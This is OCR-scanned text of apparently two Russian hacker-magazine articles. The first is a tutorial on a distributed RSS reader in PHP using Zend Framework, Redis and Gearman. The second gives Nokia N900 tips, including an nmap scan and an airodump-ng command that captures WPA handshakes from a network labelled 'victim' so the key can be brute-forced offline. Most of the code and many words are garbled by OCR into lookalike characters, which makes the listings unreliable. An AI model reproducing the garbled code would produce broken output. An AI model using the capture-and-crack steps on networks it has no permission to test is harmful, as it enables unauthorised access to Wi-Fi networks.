Первым из компонентов ХепсІ Ргатеѵѵогк, кото- 
рый нам понадобится, будет ХепсЦЭгі, он про- 
верит введенный адрес. Если все нормально, 
мы пойдем дальше; если не получится — 
может, кто-то пытается надурить систему? 

Сам код функции, реализующий проверки, ты 
найдешь в исходниках (файл ѵаІісІІІПІ.рЬр), 
а я лишь кратко опишу, как он работает. Мы 
предполагаем, что введенная строка явля- 



ется нормальным адресом (ага, доверяем 
пользователю], поэтому используем метод 
ХепсЦЭгшіъсІюгу для создания объекта адреса. 
Если что-то пойдет не так, возникнет исключе- 
ние. Далее необходимо реализовать несколько 
проверок: например, не забыл ли пользователь 
указать «ЫЧр://» в начале адреса — без нее 
(ЭРЕ считается некорректными. Обернув подоб- 
ные проверки в исключения, мы спускаемся 
по цепочке проверок и, в конце концов, либо 
получаем корректный ЕІ РЕ, либо говорим поль- 
зователю, что введенная им строка на ЭРЕ не 
тянет. 

Хорошо, предположим у нас есть корректный 
адрес сайта. Это или прямая ссылка на ленту, 
или ссылка на веб-страницу, где лента может 
быть. В нашем случае это неважно, потому как 
любую из ситуаций одинаково хорошо обраба- 
тывают заботливо созданные для нас инстру- 
менты. Будем использовать недавно появив- 
шийся в ХепсГе компонент 2епс1_Реес1_Реас1ег р 
который отлично справляется с любыми типа- 
ми лент (с любым форматированием и даже 
экзотическими лентами с встроенными ХББТ- 
стилями — этим балуются некоторые западные 
сайты вроде СІЧВС). В нем есть встроенный 
метод поиска линков на страницах, и если 
РББ-лента на этом сайте имеется, он ее най- 



дет! Еще одна особенность ХепсІ_ЕеесІ_РеасІег 
— встроенное кэширование — нам очень 
пригодится, чтобы постоянно не перекачи- 
вать кучу данных просто так. Если лент много, 
хостеру это точно не понравится. Поэтому мы 
будем использовать файловый кэш. К тому 
же, если будет много пользователей, часть из 
них станут читать одни и те же ленты — зачем 
же загружать их несколько раз? Не следует 
пренебрегать и встроенными в НТТР возмож- 
ностями кэширования. Если сервер сообщает 
нашему приложению, что лента не изменилась 
(при помощи служебных НТТР-заголовков), то 
можно смело доставать кэшированную версию. 
Программисты ХепсГа и здесь сделали за тебя 
всю работу! Чтобы все это включить и дать 
передохнуть серверу, достаточно поместить 
несколько строчек до первого использования 
компонента ХепсІ_ЕеесІ_РеасІеГ: 

$сас1іе = 2епсЕ 

Саске : : ДасДогу ( ' Соге ' , ' Рііе ' , 

аггау ( ' 1і ДеДіте ' => 24 * 3600, 

' аиДотаДіс_зегіа1І2аДіоп 1 => Дте, 

1 саске_і(І_ргеДіх 1 => 'хакер_' 

) , аггау ( 1 геас!_сопДго1_Дуре ' => 

' ас!1ег32 ' , ' саске_с1іг ' => '/Дтр/ 
хакер/саске ' ) ) ; 
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МОДУЛЬНАЯ ОБРАБОТКА 
ЛЕНТ И СООБЩЕНИИ 



НТО ПОНАДОБИТСЯ 
ДЛЯ ПОДНЯТИЯ 
ПРОЕКТА? 




Лревервд каждой новости - 
если ее нет в кеше Яейівд, 
значит навал. Записать а БД, 




О, новость! 8 БД! 



Ней І5 - кеу/ѵаіие сервер 
данных - кеш хешей уже 
сохраненных новостей 





► 



- РНР 5.2.1 1 или еще лучше, 5.3.1 . 

- Веб-сервер, АрасЬе 2.2 или ІЧдіпх. 

- База данных, Му50І_ любой вер- 
сии, но лучше всего 5.1. 

- Сервер Оеагтапб и модуль к РНР. 

- МетсасбебЬ, чтобы Сеагтапб мог 
хранить задания при перезагрузке. 

- Сервер Ресііз для кеширования, 
рекомендую Ресііз 1.2, который 
можно достать на ОііНиЬ-е. 

- 2епб Ргатеѵѵогк (лучше всего — 
Ігипк-версия из 5ѴІ\І-а]. Интерфейс 
сделаем самый простой, на базе 
]Оиегу и ] О и е гу III последних вер- 
сий. Для управления базой данных 
можно использовать рбрМуАбтіп. 




ПРОСТОЙ СПОСОБ ПОЛУЧЕНИЯ НОВОСТЕЙ ИЗ ЛЕНТ 



//Разрешаем использовать кэш 
2епс1_Ееес1_Кеас1ег : : 
зеДСасЬе ( $сас1те) ; 

//Разрешаем учитывать НТТР- 
заголовки для проверки кэша 
2епс1_Ееес1_КеасІег : : изеНккрСопсіікіоп 
аІСек ( кгие) ; 

Так мы существенно снизим нагрузку на 
сервер, и даже самая простая конфигурация 
сможет обрабатывать десятки и сотни лент, 
а вот дальше уже придется использовать 
Метсасбеб. 

Добытые ссылки нужно куда-то сохранить. 

Для этого в Му5цІ создаем две табли- 
цы — Іеесіз для хранения ссылок и изег_ 
зиЬзсгірбопз для хранения подписок. Зачем 
две? Очень просто — ты сможешь хранить 
только одну ссылку; если на ленту подписаны 
двое пользователей, то оба будут использо- 
вать один и тот же адрес. В таблицу беесіз 
нелишним будет добавить поле, чтобы запи- 
сывать количество ошибок доставки ленты. 
Код базы можно посмотреть в файле сіЬ-бці 
дистрибутива. 

ПРИКАЗАНО ПОЛУЧИТЬ НОВОСТИ! 

Теперь у нас есть некоторые вспомогательные 
инструменты, и можно приступать к построе- 
нию самого сервиса. Рассмотрим общий 
принцип. 

Периодически (например, по сгоп-у] запуска- 
ется скрипт, который берет все твои ленты из 
базы и последовательно перебирает их, про- 
веряя новые сообщения. Если сообщения есть, 
он добавляет их. При первом запуске все сооб- 



щения в лентах будут новыми, поэтому нагруз- 
ка на сервер будет значительной (если у тебя 
много лент); потом добавляться будут только 
свежие сообщения — обычно несколько в час 
(хотя есть ленты, которые обновляются каждую 
минуту и там каждый раз несколько десятков 
сообщений]. Важный вопрос: как ты поймешь, 
что сообщение из ленты новое? Ни один из 
атрибутов использовать для правильной про- 
верки не получится. Поэтому реализуем соб- 
ственные уникальные идентификаторы и будем 
пропускать каждую новость через сравнение 
со списком уже загруженных. Самый простой 
путь — просто использовать нашу Му5С11_ базу 
данных, однако скажу, что это путь для лохов. 
Подумай сам, если у тебя будет хоть с десяток- 
другой лент, очень скоро, буквально в течение 
пары недель, таблица с сообщениями разрас- 
тется до огромного размера. Если мы будем 
постоянно проверять все новости, при каждом 
запуске нашего скрипта база обязательно 
будет ложиться. 

Помнишь, мы недавно рассказывали о преемни- 
ках ССИ-а в веб-приложениях — кеу/ѵаіие храни- 
лищах (#128 номер зс, РБЕ-версия статьи — 
на диске). Предлагаю дополнить нашу раз- 
работку кэшем, который будет использовать 
самую быструю І\Іо5(Х-систему — Ресііз. В него 
мы поместим все идентификаторы сообщений, 
которые уже загружены в базу данных — и 
только если встретим новость, которой там нет, 
запишем ее как новую. 

Для работы с Ресііз-ом есть отличный класс — 
Ресіізка. Он же, кстати, добавляет в 2епб 
Егатеѵѵогк множество классов-адаптеров, 
например, можно переключить на него стан- 
дартный кэш. Подключить редиску просто: 



$гесііз_сопП = 

Аггау ( ' патезрасе ' => ' хакер_ ' , 

' зегѵег з ' => аггау ( аггау ( 

1 козк * => ' Іосаікозк ' , 

1 рогк' => 637 9, 'мел-дкР' => 1)), 

' кеуБізкгіЪиког ' => ' сгс32 ');)); 
кгу 
{ 

$гес!із = пеѵ? Кесіізка ( $гес!із_ 
сопк) ; 

} 

саксЪ. (Кес1ізка_Ехсеркіоп $е) 

{ 

сііе ( " [ЕККОК] Еггог сгеакіпд Ресііз 
іпзкапсе: " . $е->декМеззаде ( ) ) ; 

} 

Подробнее о Ресііз-е мы уже писали. Расскажу 
только про особенности нашего проекта. Для 
кэша мы будем использовать структуру дан- 
ных 5ЕТ, так как она позволяет всего одной 
командой узнать, содержится в ней указанное 
значение или нет. Соответственно, у нас будет 
столько сетов, сколько уникальных лент, а в 
каждом сете будет содержаться набор М 05- 
хешей сообщений, которые уже загружены. 
Сначала напишем простую функцию, которая 
будет принимать один или несколько адресов 
лент и последовательно проверять их на нали- 
чие новых сообщений. Позже на базе этого 
кода мы за пять минут построим гибкую рас- 
пределенную систему! 

Функция ргосеззРеесІ (смотри файл 
ргосеззРеесІ. рбр) принимает массив, в котором 
должен быть, как минимум, один элемент — 
прямая ссылка на ленту. Дальше класс автома- 
тически загрузит ленту, если это необходимо, 
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или же вытащит ее из кэша, а тебе останется >декОа(:еСгеа1:е<3 ( ) ->деСТітев1:атр ( ) ; 

только проверить, что получилось. $_і1;еш [ ' Ііпк ’ ] = $іее<а->десьіпк ( ) ; 



т 




Теперь создадим ключ новости: 

$_ібет[ ' казк' ] = тб5 ( $_ 
ібет[ 1 бібіе ' ] . 1 Г . $_ 

ібет [ ' Ііпк ' ] . ' | ' . $_ 

ібет [ * біте ' ] ) ; 

Все готово, чтобы проверить новость на 
«старость»: 

$_іказк = тс15 ($іеес!_иг1) ; //хэш 
кэша для ленты 

іі ( ( ! $гебіз->ехіз1із ($_іказк) ) 

II ( ($гебіз->ехізЦз ( $_кказк) ) && 

( ! $гебіз->ехізЦзІп8еЦ ( $_іказк, 
$_ікеш[ 'казк' ] ) ) ) 

{ 

//ух ты, новость! Добавить! 
$гебіз->аббТо8еб (тб5 ($Тееб_иг1) , 
$_ібет[ 'казк' ] ) ; 

} 

еізе 

сопбіпие; 

Код будет выполняться, только если мы 
получили новую информацию. В базе ты хра- 
нишь Ю ленты, заголовок новости, ссылку и 
две даты — время самой новости и время, 
когда она добавлена — а также посчитанный 
тбб-хеш. Записывать сообщения, конеч- 



$іееб = 2епб_Реес1_ 

Кеабег : : ішрогб ( $ іееб_иг1 ) ; 
іі ($іееб іпзбапсеОі 

2епб_Рееб_Кеабег_РеебАЪзбгасЩ ) 

{ /* код обработки ленты здесь 

*/ ) 

Видишь, все просто. Теперь разберемся с 
сообщениями. Ты же пока не знаешь, какие 
сообщения новые, какие старые, поэтому в 
любом случае надо обработать все получен- 
ные данные. Сделать это просто, ведь класс, 
который мы получили, не только содержит все 
данные из ленты, но и, что важнее, допуска- 
ет работу с собой как с обычным массивом! 
Поэтому просто запусти цикл іогеасб и он 
переберет все новости из ленты. 

Для начала вычислим уникальный ключ 
новости — используя тбб-хеш от заголовка 
новости, даты публикации и линка. Далее про- 
верим, существует ли кэш для этой ленты в 
Вебіз-е. Если его нет, значит, лента добавлена 
только что, и мы еще ее не обрабатывали. 
Получить поля сообщения также очень легко. 
Для простоты и удобства мы пока опустим 
работу с самим телом новости — это будет 
хорошим домашним заданием, а выведем 
только заголовок, ссылку и дату: 

$_ібеш[ ' бібіе 1 ] = 

кбтізресіаіскагз ( $іееб->дебТіб1е ( ) , 
ЕЫТ_<2ШТЕЗ) ? 

$_ібеш [ 1 біше ' ] = $іееб- 
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но, необходимо в транзакции, но, учитывая, что вставок может быть 
много, а ты же не хочешь завалить сервер, можно ограничиться тран- 
закцией на всю ленту. При помощи Еепб’а это делается командами: 
$бЬ-^ЬедіпТгап5асбоп() и $бЬ-^соттіШ. В крайнем случае, если что- 
то не так, сделай РоІІЬаск: $бЬ-^гоІІВаск(). 

Вот мы и получили ссылку на ленту, получили ленту (задействовав при 
этом все возможности кэширования], разобрали ее на отдельные сооб- 
щения, не парясь с конкретным форматом, а потом проверили по кэшу 
все сообщения и записали новые в базу данных. При этом минимально 
затронув самое узкое место любого веб-приложения — собственно, саму 
СУБД! 

СЕРВЕРА В УПРЯЖКЕ, 

ИЛИ ВЫХОД СЕАВМАИ'А 

Если запустить написанный нами скрипт, то он будет работать, как и 
обычная «ПеХаПешка». Сначала обработается первая лента, потом 
вторая и так далее. И неважно, на скольких серверах ты его запу- 
стишь. 

К тому же, ошибка при обработке какой-то ленты вырубит сразу весь 
скрипт, а значит, остальные новости будут пропущены. Непорядок — 
процесс просто необходимо распараллелить. 

Большинство программистов, занимающихся нагруженными серви- 
сами, пишут масштабируемые и параллельные приложения на баѵа, 

С или хотя бы Рубзоп. И будут косо смотреть в твою сторону, если ты 



массив с линками на ленты. 

В случае ошибок при обработке мы все равно будем отправлять 
сообщение серверу, что все ОК. Потому что, если ошибка связана с 
самой лентой (например, удаленный сервер лежит], то нам не надо 
сразу еще раз пробовать выполнить задание, лучше дождаться 
следующего цикла обработки. Иначе стоит появиться одной сбой- 
ной ленте, как вся система зависнет, постоянно пытаясь выполнить 
задание. 

Далее у нас есть специальный скрипт: он запускается по Сгоп’у каж- 
дые 5 минут (если хочешь, то чаще — от этого зависит частота опро- 
са лент) и будет выбирать все ссылки на ленты, которые надо обно- 
вить, формировать из них задания, а потом скомандует Оеагтап'у 
выполнить все задания параллельно. Если у тебя будет 10 лент, то, 
смотря, сколько обработчиков ты запустишь, сервер сможет прове- 
рять одновременно столько же лент. Если обработчиков меньше, то 
каждый из них последовательно будет обрабатывать свои задания, 
пока не завершит все. 

Заметь — обработчики остаются запущенными постоянно, они, по 
сути, являются демонами, поэтому если будешь небрежно писать 
код, будут накапливаться утечки памяти. Хорошо бы время от вре- 
мени их перезапускать, например, раз в неделю. Но это никак не 
повлияет на работу всей системы, даже если ты просто вырубишь 
все скрипты — задания останутся и будут обработаны, как только ты 
запустишь хоть один скрипт. А если вдруг увидишь, что сервер не 



БОЛЬШИНСТВО ПРОГРАММИСТОВ, ЗАНИМАЮЩИХСЯ 
НАГРУЖЕННЫМИ СЕРВИСАМИ, ПИШУТ МАСШТАБИРУЕМЫЕ 
И ПАРАЛЛЕЛЬНЫЕ ПРИЛОЖЕНИЯ НА МА, С ИЛИ ХОТЯ 
БЫ РѴТНОЫ. И БУДУТ КОСО СМОТРЕТЬ В ТВОЮ СТОРОНУ, 
ЕСЛИ ТЫ СКАЖЕШЬ, НТО НАПИШЕШЬ ТАКОЕ ЖЕ НА РНР. 



скажешь, что напишешь такое же на РНР. Не обращай на них вни- 
мание, давай писать на РНР! :) А поможет тебе классная технология 
Оеагтап. Это такой специальный сервер, который берет на себя 
всю работу по управлению заданиями, которые ты ему поручишь. 

Он сам выстроит их в очередь, посмотрит, сколько серверов и про- 
цессов у него есть, потом разошлет всем работу, проконтролирует 
ее выполнение и соберет результаты. Если ты добавишь еще один 
сервер, стоит только запустить на нем обработчики заданий, как 
Оеагтап сам поймет, что теперь задания можно распределить на 
новый сервер. И так с каждым новым сервером! Единственное, чего 
пока Оеагтап не может, так это выполнять работы по расписанию, 
то есть, заменить им сгоп нельзя. Сам сервер написан на С и очень 
быстрый, АРІ есть для многих языков, также можно встроить в 
МуЗОБ как II Б Е (пользовательскую функцию]. 

Для РНР есть два варианта — использовать быстрый С-модуль, 
который придется компилировать и устанавливать, или подключить 
РЕАР-пакет ІМеЫЗеагтап, написанный на чистом РНР, но более 
медленный и плохо документированный. Мы выберем модуль на С, 
тем более, поставить его очень легко — он есть в РЕСБ. Установим 
через менеджер пакетов командой «арі-деі іпзіаіі деагтапфоЬ- 
зегѵег», после чего запустим как демон «деагтапб -б». По умол- 
чанию она слушает порт 4730, на который мы и будем отправлять 
задания. 

Затем давай подумаем, как превратить код, который мы написали 
ранее, в распределенный. У нас уже есть функция, которая принима- 
ет ссылку на ленту и полностью ее обрабатывает. Мы напишем обра- 
ботчик для Оеагтап-а, который будет принимать задание — 650ІМ- 



справляется с работой, добавь еще один, запусти там новые обра- 
ботчики — и они сразу включатся в работу! Если пойти еще дальше, 
то можешь поставить счетчик, и на каждые, например, пять новых 
лент, добавленных пользователями, запускать на сервере новый 
обработчик. А если кто-то отпишется от лент, то можно и убрать лиш- 
ний процесс. 

СКРИПТЫ 

Так ты получишь динамическое масштабирование в зависи- 
мости от нагрузки. Кратко распишу, как устроены все скрипты. 
Обработчик ленты (файл беесІѴѴогкег. рЬр) после запуска создает 
объект ОеагтапѴѴогкег, который скрывает все подробности взаимо- 
действия с сервером. Далее регистрируемся на сервере (а можно и 
на нескольких] — методом абб5егѵег(]. И, наконец, зарегистрируем 
функцию как обработчик, используя произвольное имя — методом 
аббРипсБоп. Теперь, если на сервере будут задания, ассоцииро- 
ванные с этим именем, Оеагтап вызовет нашу функцию и передаст 
ей строку с заданием. В одном скрипте можно описать несколько 
функций и зарегистрировать их под разными именами, но учти, что 
одновременно сможет работать только одна. 

$ілгогкег = пеѵ? СеагтапМогкег ( ) ; 

$ілгогкег->ас1с13егѵег ( ) ; 

$ілгогкег->а<МРипскіоп ( " ТеесІРгосезог " , 

"туРеесбРгосеззог " ) ; 

Типскіоп туРеесіРгосеззог ( $ б оЬ) 
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Чтобы лучше понимать принцип работы Оеагтап, 
рассмотрим основные понятия его архитектуры. Их 
немного: 

- Задание (работа, іоЬ) — строка, которая передается 
обработчику и содержит данные для работы. Здесь ты 
должен подумать, как передавать сложные структуры 
данных. Если ничего, кроме РНР, тебя не интересует, 
не парься и бери обычную сериализацию. Если захо- 
чешь попробовать разные языки, надо, чтобы формат 
понимался каждым из них. Например, хорошо подхо- 
дит Ч50ІЧ. 

- Обработчик — скрипт на РНР (любой язык, для 
которого есть ЗоЬ АРІ], выполняющий работу. 
Одновременно можно запустить несколько обработчи- 
ков, хоть на одном сервере, хоть на тысяче, каждый из 
них это отдельный РНР-процесс. 

- Задача (Тазк) — несколько заданий, которые необ- 
ходимо выполнить параллельно. Ты ставишь серверу 
задачу, чтобы он выполнил одну или несколько работ, а 
дальше — дело техники. 

- Клиент — скрипт, который создает задания и работы 
и посылает их на сервер. 

- Сервер — собственно, центральный элемент систе- 
мы. Принимает задачи от клиентов и смотрит, каким 
обработчикам и в какой очередности распределить 
конкретные работы. Он же следит за доступностью 
обработчиков, собирает ответы и отсылает их назад 
клиенту. Если ты послал задание обработчику, но 
возникла ошибка, сервер это воспримет нормально 

и попробует переназначить задание другому доступ- 
ному обработчику. На случай, если надо перегружать 
сервер, беагтап может задействовать МуЗОЕ или 
тетсасбесІЬ для хранения там заданий, тогда ему 
нестрашны никакие падения. Конечно, самих серве- 
ров также может быть много, чтобы вырубание одного 
никак не влияло на выполнение работ. 



$Неес1з = 

2епс1_Цзоп : : сіесосіе ( $з<эЬ-> ѵгогкІоасЦ) ); 



$дтс1іепк= пем СеагтапС1іепк(); 
$дтс1іепк->ас!с18егѵег ( ) ; 

$ кеесЩІіпкз = $<іЪ->кекскАІ1 ( 1 ЗЕЬЕСТ кісі, 
кеес!_иг1 ЕЕОМ кеесіз ШНЕКЕ еггогз < 3 ' ) ; 
когеаск ( $кеес!_1іпкз аз $к1) 

{ 

еско "АсМ ко ргосеззіпд диеие : " . 

$ кі [ 1 кеесі_иг1 1 ] . "\п"; 

$дшс1іепк- 

>ас!сІТазкВаскдгоипс1 ( ' кеесІРгосезог ' , 2епс1_ 
Цзоп: : епсосіе (аггау ($к1) ) ) ; 

} 

$дтс1іепк->гипТазкз ( ) ; 

Объясню, как оно работает. Так как задания раздает кли- 
ент, мы первым делом, используя Оеагтап АРІ, создаем 
с его помощью объект клиента и регистрируем его на 
сервере. А потом выбираем из базы данных ссылки на 
все ленты, которые имеют менее 3-х ошибок. 

Если ошибок больше, вероятно, что-то с лентой не так, 
поэтому даже не будем пытаться проверять. В цикле 
перебираем все и формируем из лент задания, закоди- 
рованные в 35014-формат. После того, как весь набор 
задач сформирован, запускаем его на выполнение 
командой гипТазкзО. 

Все задачи будут выполнены по возможности парал- 
лельно и в фоновом режиме. Что означает, что мы не 
сможем получить ответ от обработчиков. 

Если же это необходимо, следует задавать задачу коман- 
дой бо(], тогда она выполнится в синхронном режиме, 
а результат будет передан тебе. Но нам значения не 
нужны, так же, как и вообще необходимость следить за 
выполнением работы — задали задачи и все, выходим 
из скрипта, остальную работу оставим серверу. 

Остается только запустить скрипт из Сгоп-а, но с этой 
задачей, думаю, ты справишься сам. Частота обновле- 
ния лент зависит от многих факторов, наверное, лучше 
всего начать с 10 минут, если лент не очень много. 
Обрати внимание: желательно, чтобы суммарное время 
обработки всех лент было меньше, чем интервал обнов- 
ления, иначе сильно возрастет нагрузка на сервер. В 
таком случае просто добавь обработчиков или же, если 
перестает справляться внешний канал, новый сервер. 
Ведь тебе сначала надо запросить у сервера ленты, а 
это порядочный трафик. 




> іпіо 

• Оеагтап РНР 
Ехіепзіоп: 

ресі.рбр.пеі/раскаде/ 

деагтап . 

• Класс на чистом РНР 
для Оеагтап: 
реаг.рбр.пеі/раскаде/ 
І\ІеІ Оеагтап . 

• Для РуЕзоп : 
[аипсбрасі.пеі/ 
деагтап-іпіегіасе: 
ватиеІ.дЕЬиЬ.сот/ 
руібоп-деагтап . 

• Для Заѵа обитает 
здесь: 

ІаипсЬрасІ.пеі:/ 

деагтап-]аѵа . 

• Р55 (Реа Ну Зітріе 
Зупсіісабоп] — целое 
семейство форматов 
для предоставления 
ХМЕ-документа с 
обновлениями сайта 
или другого источника 
данных. Кроме самого 
Р55, в который входят 
несколько версий 
спецификации, несо- 
вместимых между со- 
бой, существует про- 
двинутый протокол 
Аіют и устаревший 
сложный РОЕ. Аіют 
является стандартом 
ЫЧрУ/іюоІв.іек.огд/ 
Ы:т[/г1 : с4287 1 и актив- 
но поддерживается 
Ооодіе. 



ШЬіІе ( $ѵ\гагкег->тлгагк ( ) ) ; 

Когда обработчик вызван, ему передается специальный 
объект задания, из которого в первую очередь необходи- 
мо получить нужные нам для работы данные. Так как они 
закодированы в строку 350І\І-ом, используем компонент 
ЕепсЫзоп, который превратит строку в обычный массив. 
Всего шесть строк кода — и мы превратили нашу 
функцию обработки лент в распределенную! Теперь ты 
можешь просто заинклудить файл ргосеззЕеесЕрбр и 
передать функции ргосеззЕеесіО полученный массив 
ссылок $1юесІ5. 

Чтобы сообщить серверу ОеагтапсІ, что все отлично 
и мы выполнили задание, достаточно вызвать $рЬ- 
^епбСотр^еГОК']. Хотя вполне можно просто вернуть 
из функции Іхие: система достаточно гибкая и простая, 
чтобы делать за тебя всю работу. Еще необходимо сфор- 
мировать задачу, чтобы сервер знал, что нужно выпол- 
нить. Этот код также очень прост: 



НУ НТО, ПОЛУЧИЛОСЬ? 

Конечно, чтобы получить расширяемую систему на РНР, 
пришлось задействовать дополнительный сервер, ком- 
пилировать модуль, но стоит сделать это один раз, как в 
дальнейшем у тебя будет гибкая система, чтобы выполнять 
любую работу. 

Например, если построить фотохостинг, то ресайз карти- 
нок как раз можно делегировать Оеагтап’у. На нем даже 
настоящий поисковик собираются делать, а это тебе уже 
не игрушки. Такие сайты, как Оідд.сот и Ѵабоо! также 
используют у себя Оеагтап. Помимо этого ты попробовал 
ХепсІ Егатеѵѵогк в работе — несмотря на возгласы скепти- 
ков, что он тяжелый и сложный, мы написали Р55-ридер 
всего за несколько строк! Единственное, что пока тебя, 
наверное, смущает — чтобы посмотреть новые новости, 
даже если они уже оказались на твоем сервере, все равно 
необходимо жать кнопку обновления. Это не беда, есть 
решение, которое заткнет за пояс Ооодіе Ееасіег, но о нем 
я расскажу в одной из следующих статей, т 




> СІѴСІ 



На диске есть дис- 
трибутив с готовым 
примером, а также 
все исходные коды 
и дистрибутивы 
используемых про- 
грамм. 
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КАК И ДЛЯ ЛЮБОЙ ЫШ-СИСТЕМЫ, У МАЕМО ЕСТЬ СВОИ СЕКРЕТЫ 
И ХИТРОСТИ. ПЛАТФОРМА НЕ ПЕРЕСТАЕТ УДИВЛЯТЬ. ПОЗВОЛЯЯ 
ЗАПУСКАТЬ КАК ХАКЕРСКИЕ ТУЛЗЫ. ТАК И СТАРЫЕ ДОБРЫЕ 
ИГРЫ. СЕГОДНЯ. УЖЕ СЕРЬЕЗНО ИЗУЧИВ ТЕЛЕФОН. МЫ СОБРАЛИ 
ДЛЯ ТЕБЯ НЕСКОЛЬКО ПОЛЕЗНЫХ ТРЮКОВ. КОТОРЫМИ СПЕШИМ 
ПОДЕЛИТЬСЯ. 



ПРАВИЛЬНОЕ 

УПРАВЛЕНИЕ ПРИЛОЖЕНИЯМИ 

О том, как совладать с диспетчером прило- 
жений и устанавливать софт для N900, рас- 
сказывать не нужно. Мы уже рассказывали, 
как подключить дополнительные репозитории 
с огромным количеством бета-версий про- 
грамм, которые находятся в стадии раз- 
работки, но уже могут быть установлены на 
телефон. Но если вначале за появлением 
новых приложений еще можно было уследить, 
то со временем это переросло в серьезную 
и муторную задачу. Штудировать огромный 
список приложений в поисках новых про- 
грамм стало сильно надоедать, и тогда я 
открыл для себя замечательную программу 
АррѴѴаІсЬ. Написанная на 01, небольшая 
тулза делает одну простую вещь — мониторит 
активность разных репозитариев, отображая 
списки добавленных, обновленных, а также 
удаленных приложений. Впрочем, интересные 
приложения очень часто оказываются вообще 
вне всяких репозитариев и распространяются 
в виде .беб-пакета (как наш ВІиеІооШ-сканер, 
который мы разработали в прошлый раз]. Но и 
без менеджера пакетов установить такое при- 
ложение несложно. Подключив N окіа N900 к 
компьютеру, нужно перевести его в «Режим 
запоминающего устройства», после чего 
скопировать беЬ-файл в папку .боситепіз 
девайса. А далее, не забыв отключить девайс 
от компа, выполнить под рутом команду:: йркд 
-і /Ьоше/изег/МуВосз/ . йосишепСз/ 
[название пакета] .сІеЪ 



Рекомендую также установить тулзу МуМепи 
или Саіогізе, которые помогут не свихнуться в 
поисках нужного приложения в меню, органи- 
зовав ярлыки для запуска по разделам. 

ТРИ УСТАНАВЛИВАЕМ 
ХАКЕРСКИМ СОФТ 

Приятная новость заключается в том, что в 
репозитариях появились несколько полезных 
Х-ТооШ Тут надо заметить, что порты птар 
и аігсгаск были и для предыдущих версий 
Маето, поэтому их перенос на новую Маетоб 
был лишь вопросом времени. И вот теперь их 
можно, без напильника и прочих ухищрений, 
установить прямо из менеджера приложе- 
ний! Использование сканера безопасности 
N 17 ^ на N900 для сканирования локалки или 
отдельных хостов не отличается от действий 
с обычного линукса ровном счетом ничем! 
Правда, для Маето пока нет 0111-интерфейса, 
поэтому сканером можно воспользоваться 
только из консоли: например, птар -ѵ -О 
-РЫ 192.168.1.1. Отчет о сканировании, 
в моем случае точки доступа ѴѴі-Рі, вывел 
полную информацию об открытых портах, 
предположение об удаленной операционной 
системе, а также производителе девайса, 
определенного по его МАС-адресу. Впрочем, 
в случае точки доступа ѴѴі-Рі гораздо интерес- 
нее подобрать ѴѴЕР/ѴѴАР-ключ, что опять же 
стало доступным после появление аігсгаск'а. 
Напомню, что подбор ключа для ѴѴРА — зада- 
ча непростая и решается исключительно 
перебором/брутфорсом, причем успех напря- 



мую зависит от того, есть ли искомый ключ 
в словаре или нет. Трудность заключается в 
том, что для побора необходимо перехватить 
фрейм авторизации пользователя — так назы- 
ваемый ѴѴРА Напбзбаке. С таким фреймом 
можно брутфорсить ключ с помощью обычного 
компьютера и специального софта (в том 
числе с использованием СІЮА), кластера 
из Р53 или даже облачных вычислений — 
главное получить этот фрейм. Теперь, когда 
любая из утилит пакета аігсгаск-пд работает 
прямо с телефона, можно запустить беспро- 
водной снифер, просто указав номер канала, 
Е55Ю нужной точки доступа и некоторые 
другие параметры: аігсгаск-пд -с 11 
-е ѵісСіт -2 4 -К 1 -Р сар мІапО. 

В результате получим сар-файл, по которому 
реально восстановить ключ. Конечно, можно 
было бы пробрутфорсить ключ прямо с теле- 
фона, но скорее забавы ради, потому как ско- 
рость перебора на моем N900 не превысила 
даже 50 ключей в секунду :]. Пакет находится 
в репозитарии ехітаз-сіеѵеі, потому что пока 
не закончена функция инжекции пакетов. 

ТРИК 3 ЗАПУСКАЕМ ЛЮБИМЫЕ 
ИГРЫ 

В нашем первом обзоре мы рассказывали, как 
запустить на N900 Оиаке 3, показав насколь- 
ко обширен потенциал телефона. За те пару 
месяцев после релиза телефона под Маетоб 
были портированы другие легендарные 
игрушки: Ооот 2, ѴѴагсгаИ 2, З^агсгаИ, Оиаке, 
РесІАІегі, Оике Nикет 30. Правда, это напря- 
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ВШЕМАЕМО ПОЗВОЛЯЕТ ИСПОЛЬЗОВАТЬ N 900 N МАР ЗАМЕЧАТЕЛЬНО ЧУВСТВУЕТ СЕБЯ НА N 900 
КАК БЕСПРОВОДНУЮ КЛАВИАТУРУ И МЫШЬ 



мую зависит от наличия порта просто для 
обычного Ыпих'а: скажем, для Оиаке 3 суще- 
ствует ОрепАгепа, для ѴѴагсгаГС 2 — ѴѴагОиз, 
для Боот — РгВоот и т.д. Если такой порт 
использует Зітріе ОігесіМебіа Еауег (ЗОН, то 
очень вероятно, что порт в скором появится 
и для Маето, которая также поддерживает 
эту библиотеку. Если не вдаваться в подроб- 
ности, то ЗБИ — это кроссплатформенная 
мультимедийная библиотека, реализующая 
единый интерфейс к графической подсистеме, 
звуковым устройствам и средствам ввода. В 
результате неважно, на какой системе в буду- 
щем будет запускаться игра — на обычном 
компьютере или, как в нашем случае, мобиль- 
ной версии Еіпих'а, главное, чтобы платформа 
поддерживала ЗБИ. Некоторые из игрушек 
уже доступны в репозитории, для некоторых 
несложно найти инструкцию по установке. 
Единственный нюанс заключается в необхо- 
димости вручную скопировать файлы с тексту- 
рами и звуками из оригинальных игр. Помимо 
этого не стоит сбрасывать со счетов эмулятор 
БОЗВох, порт которого давно доступен в 
репозитарии N900. Виртуализируя окружения 
005, он позволяет запустить самые старые 
приложения, в том числе игры для МЗ-БОЗ. 

К примеру, уже сейчас можно порубиться в 
легендарный Еаііоиі (конфиги для ООЗВох'а 
ты можешь найти по адресу: тіаепопііпе.сопп/ 
Ы900/сІО5Ьох-0.73-РаЦои1:1 .сопЕМ ). правда, 
производительность пока оставляет желать 
лучшего. 



Одна из самых замечательных возможностей 
N900 — полноценный браузер, позволяю- 
щий комфортно работать с любыми МАХ- 
приложениями, в том числе Отаіі. Несмотря 
на то, что в недрах стандартного браузера 
МісгоВ уже лежит движок Могіііа Оеско, 
разработчики ЕігеЕэх ведут разработку свое- 
го собственного браузера для мобильной 
платформы. Работа над Ееппес, после 6-и 
бета-версий, наконец-то вышла на финиш- 
ную прямую: в январе появился кандидат в 
релизы. Правда, после установки браузера 



ТРИК 4: 

С БРАУЗ 



ЗАМОРОЧКИ 

ЕРОМ 



тебя, вероятно, постигнет некоторое смятение, 
потому что работает он... довольно медлен- 
но. По скорости рендеринга сайтов Ееппес 
может проигрывать в 2, а иногда и больше 
раз. Ситуацию может отчасти спасти под- 
ключение дискового кэша. Для этого, как в 
обычном файрфоксе, нужно открыть страницу 
